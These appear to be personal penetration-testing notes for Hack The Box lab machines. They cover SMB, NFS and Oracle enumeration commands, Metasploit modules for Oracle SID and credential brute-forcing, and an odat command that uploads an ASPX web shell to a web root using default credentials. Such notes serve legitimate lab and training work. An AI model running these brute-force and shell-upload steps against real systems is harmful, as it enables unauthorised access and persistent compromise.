SMB ENume:

List Directories:

smbmap -H 10.10.10.3

Connect to smb:

smbclient -N //10.10.10.3/tmp

If above command didn't work try:

smbclient -N -L //10.10.10.3/tmp --option='client min protocol=NT1'

Access SMB with valid Creds:

smbclient -W active.htb -U Administrator //10.10.10.3/tmp

Nmap command to find smb vulns:

nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.10.10.4

*****************************************************************************************************************************

NFS Enum:

Shows the directories moundted on NFS:
Showmount -e <target>


*****************************************************************************************************************************

Oracle Enumeration:

SID Bruteforce

auxiliary/scanner/oracle/sid_brute

Credentials bruteforce

auxiliary/admin/oracle/oracle_login

Upload shell in oracle:

odat dbmsxslprocessor --sysdba -s 10.10.10.82 -U scott -P tiger -d XE --putFile "C:\\inetpub\\wwwroot\\" "shell1.aspx" "/home/deepak/HTB/Boxes/Silo/shell1.aspx"
*****************************************************************************************************************************
